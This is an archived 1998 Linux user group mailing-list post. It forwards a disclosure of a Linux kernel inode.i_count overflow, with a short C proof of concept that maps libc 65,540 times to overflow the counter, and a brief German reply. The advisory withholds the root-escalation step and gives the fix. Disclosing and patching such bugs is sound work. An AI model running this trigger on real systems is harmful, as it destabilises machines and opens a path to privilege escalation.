[LUGA] Mit freundlicher Unterstützung von:
init.at

Mail Thread Index


[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [luga] Linux inode.i_count overflow



On Wednesday, 21 Jan 1998 9:9, Vinzenz Grabner wrote:
> 
> Subject: BoS:      Linux inode.i_count overflow
> 
> 
> http://www.ms.mff.cuni.cz/~jkot2155/linuxbug.html
> 
>    While I was working on my master thesis (Emulation of [1]Classic
>    Operating Systems in [2]Distributed Environment), I found following
>    two nasty things in Linux sources:
> 
>                         i_count Overflow Security Hole
> 
>    Member i_count in struct inode contains the usage count. It is of type
>    unsigned short, which is only 16-bit long on i386. Unfortunately, it
>    is not enough. You can make it overflow by mapping one file many
>    times:
> #include <unistd.h>
> #include <fcntl.h>
> #include <sys/mman.h>
> 
> void main()
> {
>  int fd, i;
> 
>  fd = open("/lib/libc.so.5", O_RDONLY);
> 
>  for(i = 0; i < 65540; i++)
>  {
>   mmap((char*)0x50000000 + (0x1000 * i), 0x1000,
>    PROT_READ, MAP_SHARED | MAP_FIXED, fd, 0);
>  }
> }
> 
>    Warning: This program will cause unpredictable behavior of the whole
>    system!!!
> 
>    While killing this program kernel will print many messages:
> VFS: iput: trying to free free inode
> 
>    After executing the program, there will be free inode which is
>    actually mapped in other processes. The only think you need to grab
>    root privileges is opening your modified libc in original inode and
>    making system to use it. It is a little tricky magic with inode cache
>    and memory manager. I will not publish it here to avoid misuse of this
>    security hole.
> 
>    To fix this bug simply change the i_count type to unsigned long.

Hmm und wieso kann ich den nicht overflowen ?

> 
>   Related links
> 
>      * [3]Reply to my linux-security post
[...] 
> References
> 
>    1. http://www.linux.org/
>    2. http://ulita.ms.mff.cuni.cz/pub/t4/
>    3. http://www.ms.mff.cuni.cz/~jkot2155/linuxbug/wolff.txt.iso-8859-1
>    4. mailto:Jan.Kotas@acm.org
> 
> 
> 
> ------- End of Forwarded Message
> 
> 


Ciao,
	Bernd

--
 Bernd Petrovitsch                  Institute of Computer Technology
 Gußhausstraße 25-29, A-1040 Vienna    Email: bernd@ict.tuwien.ac.at
 "...Unix, MS-DOS, and Windows NT (also known as the Good, the Bad, 
 and the Ugly)."                                     (By Matt Welsh)
 UNIX is user-friendly ... it's just selective about who its friends
 are !!                                 2 is the oddest prime number





powered by LINUX the choice of a gnu generation
linux user group austria;
Suche
Suche
Letzte Änderung:
webmaster@luga.at
September 2010